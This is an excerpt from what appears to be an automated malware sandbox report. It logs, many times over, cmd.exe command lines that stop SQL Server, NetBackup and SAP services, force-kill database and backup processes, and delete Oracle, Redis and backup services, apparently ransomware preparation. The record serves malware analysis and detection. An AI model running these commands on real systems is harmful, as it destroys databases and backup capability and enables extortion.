        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & net stop "MSOLAP$SHOPCONTROL9" & net stop "MSSQL$SHOPCONTROL9" & net stop "MSSQLFDLauncher$SHOPCONTROL9" & net stop "ReportServer$SHOPCONTROL9" & net stop "SQLAgent$SHOPCONTROL9" & net stop "NetBackup Client Service" & net stop "NetBackup Discovery Framework" & net stop "NetBackup Legacy Client Service" & net stop "NetBackup Legacy Network Service" & net stop "NetBackup Proxy Service" & net stop "NetBackup SAN Client Fibre Transport Service" & taskkill /IM mysqld-nt.exe /F & taskkill /IM NFVPrint.exe /F & taskkill /IM licenceserver.exe /F & taskkill /IM Launchpad.exe /F & taskkill /F /IM "FileZilla Server.exe" & taskkill /F /IM cbService.exe & taskkill /F /IM cbInterface.exe & taskkill /F /IM pvxwin32.exe & taskkill /F /IM pvxwin64.exe & taskkill /F /IM pvxcom.exe & taskkill /F /IM pvxiosvr.exe & taskkill /F /IM Sage.NA.AT_AU.SysTray.exe & taskkill /F /IM Sage.NA.AT_AU.Service.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & net stop "MSOLAP$SHOPCONTROL9" & net stop "MSSQL$SHOPCONTROL9" & net stop "MSSQLFDLauncher$SHOPCONTROL9" & net stop "ReportServer$SHOPCONTROL9" & net stop "SQLAgent$SHOPCONTROL9" & net stop "NetBackup Client Service" & net stop "NetBackup Discovery Framework" & net stop "NetBackup Legacy Client Service" & net stop "NetBackup Legacy Network Service" & net stop "NetBackup Proxy Service" & net stop "NetBackup SAN Client Fibre Transport Service" & taskkill /IM mysqld-nt.exe /F & taskkill /IM NFVPrint.exe /F & taskkill /IM licenceserver.exe /F & taskkill /IM Launchpad.exe /F & taskkill /F /IM "FileZilla Server.exe" & taskkill /F /IM cbService.exe & taskkill /F /IM cbInterface.exe & taskkill /F /IM pvxwin32.exe & taskkill /F /IM pvxwin64.exe & taskkill /F /IM pvxcom.exe & taskkill /F /IM pvxiosvr.exe & taskkill /F /IM Sage.NA.AT_AU.SysTray.exe & taskkill /F /IM Sage.NA.AT_AU.Service.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & net stop "MSOLAP$SHOPCONTROL9" & net stop "MSSQL$SHOPCONTROL9" & net stop "MSSQLFDLauncher$SHOPCONTROL9" & net stop "ReportServer$SHOPCONTROL9" & net stop "SQLAgent$SHOPCONTROL9" & net stop "NetBackup Client Service" & net stop "NetBackup Discovery Framework" & net stop "NetBackup Legacy Client Service" & net stop "NetBackup Legacy Network Service" & net stop "NetBackup Proxy Service" & net stop "NetBackup SAN Client Fibre Transport Service" & taskkill /IM mysqld-nt.exe /F & taskkill /IM NFVPrint.exe /F & taskkill /IM licenceserver.exe /F & taskkill /IM Launchpad.exe /F & taskkill /F /IM "FileZilla Server.exe" & taskkill /F /IM cbService.exe & taskkill /F /IM cbInterface.exe & taskkill /F /IM pvxwin32.exe & taskkill /F /IM pvxwin64.exe & taskkill /F /IM pvxcom.exe & taskkill /F /IM pvxiosvr.exe & taskkill /F /IM Sage.NA.AT_AU.SysTray.exe & taskkill /F /IM Sage.NA.AT_AU.Service.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & net stop "MSOLAP$SHOPCONTROL9" & net stop "MSSQL$SHOPCONTROL9" & net stop "MSSQLFDLauncher$SHOPCONTROL9" & net stop "ReportServer$SHOPCONTROL9" & net stop "SQLAgent$SHOPCONTROL9" & net stop "NetBackup Client Service" & net stop "NetBackup Discovery Framework" & net stop "NetBackup Legacy Client Service" & net stop "NetBackup Legacy Network Service" & net stop "NetBackup Proxy Service" & net stop "NetBackup SAN Client Fibre Transport Service" & taskkill /IM mysqld-nt.exe /F & taskkill /IM NFVPrint.exe /F & taskkill /IM licenceserver.exe /F & taskkill /IM Launchpad.exe /F & taskkill /F /IM "FileZilla Server.exe" & taskkill /F /IM cbService.exe & taskkill /F /IM cbInterface.exe & taskkill /F /IM pvxwin32.exe & taskkill /F /IM pvxwin64.exe & taskkill /F /IM pvxcom.exe & taskkill /F /IM pvxiosvr.exe & taskkill /F /IM Sage.NA.AT_AU.SysTray.exe & taskkill /F /IM Sage.NA.AT_AU.Service.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & net stop "MSOLAP$SHOPCONTROL9" & net stop "MSSQL$SHOPCONTROL9" & net stop "MSSQLFDLauncher$SHOPCONTROL9" & net stop "ReportServer$SHOPCONTROL9" & net stop "SQLAgent$SHOPCONTROL9" & net stop "NetBackup Client Service" & net stop "NetBackup Discovery Framework" & net stop "NetBackup Legacy Client Service" & net stop "NetBackup Legacy Network Service" & net stop "NetBackup Proxy Service" & net stop "NetBackup SAN Client Fibre Transport Service" & taskkill /IM mysqld-nt.exe /F & taskkill /IM NFVPrint.exe /F & taskkill /IM licenceserver.exe /F & taskkill /IM Launchpad.exe /F & taskkill /F /IM "FileZilla Server.exe" & taskkill /F /IM cbService.exe & taskkill /F /IM cbInterface.exe & taskkill /F /IM pvxwin32.exe & taskkill /F /IM pvxwin64.exe & taskkill /F /IM pvxcom.exe & taskkill /F /IM pvxiosvr.exe & taskkill /F /IM Sage.NA.AT_AU.SysTray.exe & taskkill /F /IM Sage.NA.AT_AU.Service.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & net stop "MSOLAP$SHOPCONTROL9" & net stop "MSSQL$SHOPCONTROL9" & net stop "MSSQLFDLauncher$SHOPCONTROL9" & net stop "ReportServer$SHOPCONTROL9" & net stop "SQLAgent$SHOPCONTROL9" & net stop "NetBackup Client Service" & net stop "NetBackup Discovery Framework" & net stop "NetBackup Legacy Client Service" & net stop "NetBackup Legacy Network Service" & net stop "NetBackup Proxy Service" & net stop "NetBackup SAN Client Fibre Transport Service" & taskkill /IM mysqld-nt.exe /F & taskkill /IM NFVPrint.exe /F & taskkill /IM licenceserver.exe /F & taskkill /IM Launchpad.exe /F & taskkill /F /IM "FileZilla Server.exe" & taskkill /F /IM cbService.exe & taskkill /F /IM cbInterface.exe & taskkill /F /IM pvxwin32.exe & taskkill /F /IM pvxwin64.exe & taskkill /F /IM pvxcom.exe & taskkill /F /IM pvxiosvr.exe & taskkill /F /IM Sage.NA.AT_AU.SysTray.exe & taskkill /F /IM Sage.NA.AT_AU.Service.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & net stop "MSOLAP$SHOPCONTROL9" & net stop "MSSQL$SHOPCONTROL9" & net stop "MSSQLFDLauncher$SHOPCONTROL9" & net stop "ReportServer$SHOPCONTROL9" & net stop "SQLAgent$SHOPCONTROL9" & net stop "NetBackup Client Service" & net stop "NetBackup Discovery Framework" & net stop "NetBackup Legacy Client Service" & net stop "NetBackup Legacy Network Service" & net stop "NetBackup Proxy Service" & net stop "NetBackup SAN Client Fibre Transport Service" & taskkill /IM mysqld-nt.exe /F & taskkill /IM NFVPrint.exe /F & taskkill /IM licenceserver.exe /F & taskkill /IM Launchpad.exe /F & taskkill /F /IM "FileZilla Server.exe" & taskkill /F /IM cbService.exe & taskkill /F /IM cbInterface.exe & taskkill /F /IM pvxwin32.exe & taskkill /F /IM pvxwin64.exe & taskkill /F /IM pvxcom.exe & taskkill /F /IM pvxiosvr.exe & taskkill /F /IM Sage.NA.AT_AU.SysTray.exe & taskkill /F /IM Sage.NA.AT_AU.Service.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & net stop "MSOLAP$SHOPCONTROL9" & net stop "MSSQL$SHOPCONTROL9" & net stop "MSSQLFDLauncher$SHOPCONTROL9" & net stop "ReportServer$SHOPCONTROL9" & net stop "SQLAgent$SHOPCONTROL9" & net stop "NetBackup Client Service" & net stop "NetBackup Discovery Framework" & net stop "NetBackup Legacy Client Service" & net stop "NetBackup Legacy Network Service" & net stop "NetBackup Proxy Service" & net stop "NetBackup SAN Client Fibre Transport Service" & taskkill /IM mysqld-nt.exe /F & taskkill /IM NFVPrint.exe /F & taskkill /IM licenceserver.exe /F & taskkill /IM Launchpad.exe /F & taskkill /F /IM "FileZilla Server.exe" & taskkill /F /IM cbService.exe & taskkill /F /IM cbInterface.exe & taskkill /F /IM pvxwin32.exe & taskkill /F /IM pvxwin64.exe & taskkill /F /IM pvxcom.exe & taskkill /F /IM pvxiosvr.exe & taskkill /F /IM Sage.NA.AT_AU.SysTray.exe & taskkill /F /IM Sage.NA.AT_AU.Service.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & net stop "MSOLAP$SHOPCONTROL9" & net stop "MSSQL$SHOPCONTROL9" & net stop "MSSQLFDLauncher$SHOPCONTROL9" & net stop "ReportServer$SHOPCONTROL9" & net stop "SQLAgent$SHOPCONTROL9" & net stop "NetBackup Client Service" & net stop "NetBackup Discovery Framework" & net stop "NetBackup Legacy Client Service" & net stop "NetBackup Legacy Network Service" & net stop "NetBackup Proxy Service" & net stop "NetBackup SAN Client Fibre Transport Service" & taskkill /IM mysqld-nt.exe /F & taskkill /IM NFVPrint.exe /F & taskkill /IM licenceserver.exe /F & taskkill /IM Launchpad.exe /F & taskkill /F /IM "FileZilla Server.exe" & taskkill /F /IM cbService.exe & taskkill /F /IM cbInterface.exe & taskkill /F /IM pvxwin32.exe & taskkill /F /IM pvxwin64.exe & taskkill /F /IM pvxcom.exe & taskkill /F /IM pvxiosvr.exe & taskkill /F /IM Sage.NA.AT_AU.SysTray.exe & taskkill /F /IM Sage.NA.AT_AU.Service.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & @taskkill /IM DDSoftPwsTomcat9.exe /F & @taskkill /IM U8SmartClient.exe /F & @taskkill /IM U8SmartClientMonitor.exe /F & @taskkill /IM tomcat9.exe /F & @taskkill /IM SqlManagement.exe /F & @sc delete "SiebelApplicationContainer_Siebel_Home_d_Siebel_sai" & @taskkill /IM ReportingServicesService.exe /F & @sc delete "ReportServer$SQLEXPRESS" & @sc delete TongBackupSrv & @taskkill /IM TongBackupSrv.exe /F & @taskkill /IM UFMsgCenterService.exe /F & @taskkill /IM "Cobian.exe" /F & @taskkill /IM "SAP Business One.exe" /F & @net stop "SQLBackupAndFTP Client Service" & @taskkill /IM "SqlBak.Service.exe" /F & @net stop cbVSCService & @net stop "SAP Business One RSP Agent Service" & @net stop SAPB1iDIProxy & @net stop "SAPB1iDIProxy_Monitor" & @net stop SAPB1iEventSender & @net stop SBOClientAgent & @net stop SBODI_Server & @net stop SBOJobServiceBackEnd & @net stop SBOMail & @net stop SBOWFDataAccess & @net stop SBOWorkflowuser"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & @taskkill /IM DDSoftPwsTomcat9.exe /F & @taskkill /IM U8SmartClient.exe /F & @taskkill /IM U8SmartClientMonitor.exe /F & @taskkill /IM tomcat9.exe /F & @taskkill /IM SqlManagement.exe /F & @sc delete "SiebelApplicationContainer_Siebel_Home_d_Siebel_sai" & @taskkill /IM ReportingServicesService.exe /F & @sc delete "ReportServer$SQLEXPRESS" & @sc delete TongBackupSrv & @taskkill /IM TongBackupSrv.exe /F & @taskkill /IM UFMsgCenterService.exe /F & @taskkill /IM "Cobian.exe" /F & @taskkill /IM "SAP Business One.exe" /F & @net stop "SQLBackupAndFTP Client Service" & @taskkill /IM "SqlBak.Service.exe" /F & @net stop cbVSCService & @net stop "SAP Business One RSP Agent Service" & @net stop SAPB1iDIProxy & @net stop "SAPB1iDIProxy_Monitor" & @net stop SAPB1iEventSender & @net stop SBOClientAgent & @net stop SBODI_Server & @net stop SBOJobServiceBackEnd & @net stop SBOMail & @net stop SBOWFDataAccess & @net stop SBOWorkflowuser"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & @taskkill /IM DDSoftPwsTomcat9.exe /F & @taskkill /IM U8SmartClient.exe /F & @taskkill /IM U8SmartClientMonitor.exe /F & @taskkill /IM tomcat9.exe /F & @taskkill /IM SqlManagement.exe /F & @sc delete "SiebelApplicationContainer_Siebel_Home_d_Siebel_sai" & @taskkill /IM ReportingServicesService.exe /F & @sc delete "ReportServer$SQLEXPRESS" & @sc delete TongBackupSrv & @taskkill /IM TongBackupSrv.exe /F & @taskkill /IM UFMsgCenterService.exe /F & @taskkill /IM "Cobian.exe" /F & @taskkill /IM "SAP Business One.exe" /F & @net stop "SQLBackupAndFTP Client Service" & @taskkill /IM "SqlBak.Service.exe" /F & @net stop cbVSCService & @net stop "SAP Business One RSP Agent Service" & @net stop SAPB1iDIProxy & @net stop "SAPB1iDIProxy_Monitor" & @net stop SAPB1iEventSender & @net stop SBOClientAgent & @net stop SBODI_Server & @net stop SBOJobServiceBackEnd & @net stop SBOMail & @net stop SBOWFDataAccess & @net stop SBOWorkflowuser"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & @taskkill /IM DDSoftPwsTomcat9.exe /F & @taskkill /IM U8SmartClient.exe /F & @taskkill /IM U8SmartClientMonitor.exe /F & @taskkill /IM tomcat9.exe /F & @taskkill /IM SqlManagement.exe /F & @sc delete "SiebelApplicationContainer_Siebel_Home_d_Siebel_sai" & @taskkill /IM ReportingServicesService.exe /F & @sc delete "ReportServer$SQLEXPRESS" & @sc delete TongBackupSrv & @taskkill /IM TongBackupSrv.exe /F & @taskkill /IM UFMsgCenterService.exe /F & @taskkill /IM "Cobian.exe" /F & @taskkill /IM "SAP Business One.exe" /F & @net stop "SQLBackupAndFTP Client Service" & @taskkill /IM "SqlBak.Service.exe" /F & @net stop cbVSCService & @net stop "SAP Business One RSP Agent Service" & @net stop SAPB1iDIProxy & @net stop "SAPB1iDIProxy_Monitor" & @net stop SAPB1iEventSender & @net stop SBOClientAgent & @net stop SBODI_Server & @net stop SBOJobServiceBackEnd & @net stop SBOMail & @net stop SBOWFDataAccess & @net stop SBOWorkflowuser"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & @taskkill /IM DDSoftPwsTomcat9.exe /F & @taskkill /IM U8SmartClient.exe /F & @taskkill /IM U8SmartClientMonitor.exe /F & @taskkill /IM tomcat9.exe /F & @taskkill /IM SqlManagement.exe /F & @sc delete "SiebelApplicationContainer_Siebel_Home_d_Siebel_sai" & @taskkill /IM ReportingServicesService.exe /F & @sc delete "ReportServer$SQLEXPRESS" & @sc delete TongBackupSrv & @taskkill /IM TongBackupSrv.exe /F & @taskkill /IM UFMsgCenterService.exe /F & @taskkill /IM "Cobian.exe" /F & @taskkill /IM "SAP Business One.exe" /F & @net stop "SQLBackupAndFTP Client Service" & @taskkill /IM "SqlBak.Service.exe" /F & @net stop cbVSCService & @net stop "SAP Business One RSP Agent Service" & @net stop SAPB1iDIProxy & @net stop "SAPB1iDIProxy_Monitor" & @net stop SAPB1iEventSender & @net stop SBOClientAgent & @net stop SBODI_Server & @net stop SBOJobServiceBackEnd & @net stop SBOMail & @net stop SBOWFDataAccess & @net stop SBOWorkflowuser"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & @taskkill /IM DDSoftPwsTomcat9.exe /F & @taskkill /IM U8SmartClient.exe /F & @taskkill /IM U8SmartClientMonitor.exe /F & @taskkill /IM tomcat9.exe /F & @taskkill /IM SqlManagement.exe /F & @sc delete "SiebelApplicationContainer_Siebel_Home_d_Siebel_sai" & @taskkill /IM ReportingServicesService.exe /F & @sc delete "ReportServer$SQLEXPRESS" & @sc delete TongBackupSrv & @taskkill /IM TongBackupSrv.exe /F & @taskkill /IM UFMsgCenterService.exe /F & @taskkill /IM "Cobian.exe" /F & @taskkill /IM "SAP Business One.exe" /F & @net stop "SQLBackupAndFTP Client Service" & @taskkill /IM "SqlBak.Service.exe" /F & @net stop cbVSCService & @net stop "SAP Business One RSP Agent Service" & @net stop SAPB1iDIProxy & @net stop "SAPB1iDIProxy_Monitor" & @net stop SAPB1iEventSender & @net stop SBOClientAgent & @net stop SBODI_Server & @net stop SBOJobServiceBackEnd & @net stop SBOMail & @net stop SBOWFDataAccess & @net stop SBOWorkflowuser"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & @taskkill /IM DDSoftPwsTomcat9.exe /F & @taskkill /IM U8SmartClient.exe /F & @taskkill /IM U8SmartClientMonitor.exe /F & @taskkill /IM tomcat9.exe /F & @taskkill /IM SqlManagement.exe /F & @sc delete "SiebelApplicationContainer_Siebel_Home_d_Siebel_sai" & @taskkill /IM ReportingServicesService.exe /F & @sc delete "ReportServer$SQLEXPRESS" & @sc delete TongBackupSrv & @taskkill /IM TongBackupSrv.exe /F & @taskkill /IM UFMsgCenterService.exe /F & @taskkill /IM "Cobian.exe" /F & @taskkill /IM "SAP Business One.exe" /F & @net stop "SQLBackupAndFTP Client Service" & @taskkill /IM "SqlBak.Service.exe" /F & @net stop cbVSCService & @net stop "SAP Business One RSP Agent Service" & @net stop SAPB1iDIProxy & @net stop "SAPB1iDIProxy_Monitor" & @net stop SAPB1iEventSender & @net stop SBOClientAgent & @net stop SBODI_Server & @net stop SBOJobServiceBackEnd & @net stop SBOMail & @net stop SBOWFDataAccess & @net stop SBOWorkflowuser"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & @taskkill /IM DDSoftPwsTomcat9.exe /F & @taskkill /IM U8SmartClient.exe /F & @taskkill /IM U8SmartClientMonitor.exe /F & @taskkill /IM tomcat9.exe /F & @taskkill /IM SqlManagement.exe /F & @sc delete "SiebelApplicationContainer_Siebel_Home_d_Siebel_sai" & @taskkill /IM ReportingServicesService.exe /F & @sc delete "ReportServer$SQLEXPRESS" & @sc delete TongBackupSrv & @taskkill /IM TongBackupSrv.exe /F & @taskkill /IM UFMsgCenterService.exe /F & @taskkill /IM "Cobian.exe" /F & @taskkill /IM "SAP Business One.exe" /F & @net stop "SQLBackupAndFTP Client Service" & @taskkill /IM "SqlBak.Service.exe" /F & @net stop cbVSCService & @net stop "SAP Business One RSP Agent Service" & @net stop SAPB1iDIProxy & @net stop "SAPB1iDIProxy_Monitor" & @net stop SAPB1iEventSender & @net stop SBOClientAgent & @net stop SBODI_Server & @net stop SBOJobServiceBackEnd & @net stop SBOMail & @net stop SBOWFDataAccess & @net stop SBOWorkflowuser"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & @taskkill /IM DDSoftPwsTomcat9.exe /F & @taskkill /IM U8SmartClient.exe /F & @taskkill /IM U8SmartClientMonitor.exe /F & @taskkill /IM tomcat9.exe /F & @taskkill /IM SqlManagement.exe /F & @sc delete "SiebelApplicationContainer_Siebel_Home_d_Siebel_sai" & @taskkill /IM ReportingServicesService.exe /F & @sc delete "ReportServer$SQLEXPRESS" & @sc delete TongBackupSrv & @taskkill /IM TongBackupSrv.exe /F & @taskkill /IM UFMsgCenterService.exe /F & @taskkill /IM "Cobian.exe" /F & @taskkill /IM "SAP Business One.exe" /F & @net stop "SQLBackupAndFTP Client Service" & @taskkill /IM "SqlBak.Service.exe" /F & @net stop cbVSCService & @net stop "SAP Business One RSP Agent Service" & @net stop SAPB1iDIProxy & @net stop "SAPB1iDIProxy_Monitor" & @net stop SAPB1iEventSender & @net stop SBOClientAgent & @net stop SBODI_Server & @net stop SBOJobServiceBackEnd & @net stop SBOMail & @net stop SBOWFDataAccess & @net stop SBOWorkflowuser"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & @taskkill /IM DDSoftPwsTomcat9.exe /F & @taskkill /IM U8SmartClient.exe /F & @taskkill /IM U8SmartClientMonitor.exe /F & @taskkill /IM tomcat9.exe /F & @taskkill /IM SqlManagement.exe /F & @sc delete "SiebelApplicationContainer_Siebel_Home_d_Siebel_sai" & @taskkill /IM ReportingServicesService.exe /F & @sc delete "ReportServer$SQLEXPRESS" & @sc delete TongBackupSrv & @taskkill /IM TongBackupSrv.exe /F & @taskkill /IM UFMsgCenterService.exe /F & @taskkill /IM "Cobian.exe" /F & @taskkill /IM "SAP Business One.exe" /F & @net stop "SQLBackupAndFTP Client Service" & @taskkill /IM "SqlBak.Service.exe" /F & @net stop cbVSCService & @net stop "SAP Business One RSP Agent Service" & @net stop SAPB1iDIProxy & @net stop "SAPB1iDIProxy_Monitor" & @net stop SAPB1iEventSender & @net stop SBOClientAgent & @net stop SBODI_Server & @net stop SBOJobServiceBackEnd & @net stop SBOMail & @net stop SBOWFDataAccess & @net stop SBOWorkflowuser"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & @taskkill /IM DDSoftPwsTomcat9.exe /F & @taskkill /IM U8SmartClient.exe /F & @taskkill /IM U8SmartClientMonitor.exe /F & @taskkill /IM tomcat9.exe /F & @taskkill /IM SqlManagement.exe /F & @sc delete "SiebelApplicationContainer_Siebel_Home_d_Siebel_sai" & @taskkill /IM ReportingServicesService.exe /F & @sc delete "ReportServer$SQLEXPRESS" & @sc delete TongBackupSrv & @taskkill /IM TongBackupSrv.exe /F & @taskkill /IM UFMsgCenterService.exe /F & @taskkill /IM "Cobian.exe" /F & @taskkill /IM "SAP Business One.exe" /F & @net stop "SQLBackupAndFTP Client Service" & @taskkill /IM "SqlBak.Service.exe" /F & @net stop cbVSCService & @net stop "SAP Business One RSP Agent Service" & @net stop SAPB1iDIProxy & @net stop "SAPB1iDIProxy_Monitor" & @net stop SAPB1iEventSender & @net stop SBOClientAgent & @net stop SBODI_Server & @net stop SBOJobServiceBackEnd & @net stop SBOMail & @net stop SBOWFDataAccess & @net stop SBOWorkflowuser"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & @sc delete OracleOraDb11g_home1ClrAgent & @sc delete OracleOraDb11g_home1TNSListener & @sc delete OracleVssWriterORCL & @sc delete OracleServiceORCL & @sc delete aspnet_state @sc delete Redis & @sc delete OracleVssWriterORCL & @sc delete JhTask & @sc delete ImeDictUpdateService & @sc delete XT800Service_Personal & @sc delete MCService & @sc delete ImeDictUpdateService & @sc delete allpass_redisservice_port21160 & @sc delete "Flash Helper Service" & @sc delete "Kiwi Syslog Server" & @sc delete "UWS HiPriv Services" & net stop MSSQL$FE_EXPRESS"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & @sc delete OracleOraDb11g_home1ClrAgent & @sc delete OracleOraDb11g_home1TNSListener & @sc delete OracleVssWriterORCL & @sc delete OracleServiceORCL & @sc delete aspnet_state @sc delete Redis & @sc delete OracleVssWriterORCL & @sc delete JhTask & @sc delete ImeDictUpdateService & @sc delete XT800Service_Personal & @sc delete MCService & @sc delete ImeDictUpdateService & @sc delete allpass_redisservice_port21160 & @sc delete "Flash Helper Service" & @sc delete "Kiwi Syslog Server" & @sc delete "UWS HiPriv Services" & net stop MSSQL$FE_EXPRESS"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & @sc delete OracleOraDb11g_home1ClrAgent & @sc delete OracleOraDb11g_home1TNSListener & @sc delete OracleVssWriterORCL & @sc delete OracleServiceORCL & @sc delete aspnet_state @sc delete Redis & @sc delete OracleVssWriterORCL & @sc delete JhTask & @sc delete ImeDictUpdateService & @sc delete XT800Service_Personal & @sc delete MCService & @sc delete ImeDictUpdateService & @sc delete allpass_redisservice_port21160 & @sc delete "Flash Helper Service" & @sc delete "Kiwi Syslog Server" & @sc delete "UWS HiPriv Services" & net stop MSSQL$FE_EXPRESS"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & @sc delete OracleOraDb11g_home1ClrAgent & @sc delete OracleOraDb11g_home1TNSListener & @sc delete OracleVssWriterORCL & @sc delete OracleServiceORCL & @sc delete aspnet_state @sc delete Redis & @sc delete OracleVssWriterORCL & @sc delete JhTask & @sc delete ImeDictUpdateService & @sc delete XT800Service_Personal & @sc delete MCService & @sc delete ImeDictUpdateService & @sc delete allpass_redisservice_port21160 & @sc delete "Flash Helper Service" & @sc delete "Kiwi Syslog Server" & @sc delete "UWS HiPriv Services" & net stop MSSQL$FE_EXPRESS"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & @sc delete OracleOraDb11g_home1ClrAgent & @sc delete OracleOraDb11g_home1TNSListener & @sc delete OracleVssWriterORCL & @sc delete OracleServiceORCL & @sc delete aspnet_state @sc delete Redis & @sc delete OracleVssWriterORCL & @sc delete JhTask & @sc delete ImeDictUpdateService & @sc delete XT800Service_Personal & @sc delete MCService & @sc delete ImeDictUpdateService & @sc delete allpass_redisservice_port21160 & @sc delete "Flash Helper Service" & @sc delete "Kiwi Syslog Server" & @sc delete "UWS HiPriv Services" & net stop MSSQL$FE_EXPRESS"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & @sc delete OracleOraDb11g_home1ClrAgent & @sc delete OracleOraDb11g_home1TNSListener & @sc delete OracleVssWriterORCL & @sc delete OracleServiceORCL & @sc delete aspnet_state @sc delete Redis & @sc delete OracleVssWriterORCL & @sc delete JhTask & @sc delete ImeDictUpdateService & @sc delete XT800Service_Personal & @sc delete MCService & @sc delete ImeDictUpdateService & @sc delete allpass_redisservice_port21160 & @sc delete "Flash Helper Service" & @sc delete "Kiwi Syslog Server" & @sc delete "UWS HiPriv Services" & net stop MSSQL$FE_EXPRESS"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & @sc delete OracleOraDb11g_home1ClrAgent & @sc delete OracleOraDb11g_home1TNSListener & @sc delete OracleVssWriterORCL & @sc delete OracleServiceORCL & @sc delete aspnet_state @sc delete Redis & @sc delete OracleVssWriterORCL & @sc delete JhTask & @sc delete ImeDictUpdateService & @sc delete XT800Service_Personal & @sc delete MCService & @sc delete ImeDictUpdateService & @sc delete allpass_redisservice_port21160 & @sc delete "Flash Helper Service" & @sc delete "Kiwi Syslog Server" & @sc delete "UWS HiPriv Services" & net stop MSSQL$FE_EXPRESS"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & @sc delete OracleOraDb11g_home1ClrAgent & @sc delete OracleOraDb11g_home1TNSListener & @sc delete OracleVssWriterORCL & @sc delete OracleServiceORCL & @sc delete aspnet_state @sc delete Redis & @sc delete OracleVssWriterORCL & @sc delete JhTask & @sc delete ImeDictUpdateService & @sc delete XT800Service_Personal & @sc delete MCService & @sc delete ImeDictUpdateService & @sc delete allpass_redisservice_port21160 & @sc delete "Flash Helper Service" & @sc delete "Kiwi Syslog Server" & @sc delete "UWS HiPriv Services" & net stop MSSQL$FE_EXPRESS"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & @sc delete OracleOraDb11g_home1ClrAgent & @sc delete OracleOraDb11g_home1TNSListener & @sc delete OracleVssWriterORCL & @sc delete OracleServiceORCL & @sc delete aspnet_state @sc delete Redis & @sc delete OracleVssWriterORCL & @sc delete JhTask & @sc delete ImeDictUpdateService & @sc delete XT800Service_Personal & @sc delete MCService & @sc delete ImeDictUpdateService & @sc delete allpass_redisservice_port21160 & @sc delete "Flash Helper Service" & @sc delete "Kiwi Syslog Server" & @sc delete "UWS HiPriv Services" & net stop MSSQL$FE_EXPRESS"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & @sc delete OracleOraDb11g_home1ClrAgent & @sc delete OracleOraDb11g_home1TNSListener & @sc delete OracleVssWriterORCL & @sc delete OracleServiceORCL & @sc delete aspnet_state @sc delete Redis & @sc delete OracleVssWriterORCL & @sc delete JhTask & @sc delete ImeDictUpdateService & @sc delete XT800Service_Personal & @sc delete MCService & @sc delete ImeDictUpdateService & @sc delete allpass_redisservice_port21160 & @sc delete "Flash Helper Service" & @sc delete "Kiwi Syslog Server" & @sc delete "UWS HiPriv Services" & net stop MSSQL$FE_EXPRESS"Jump to behavior
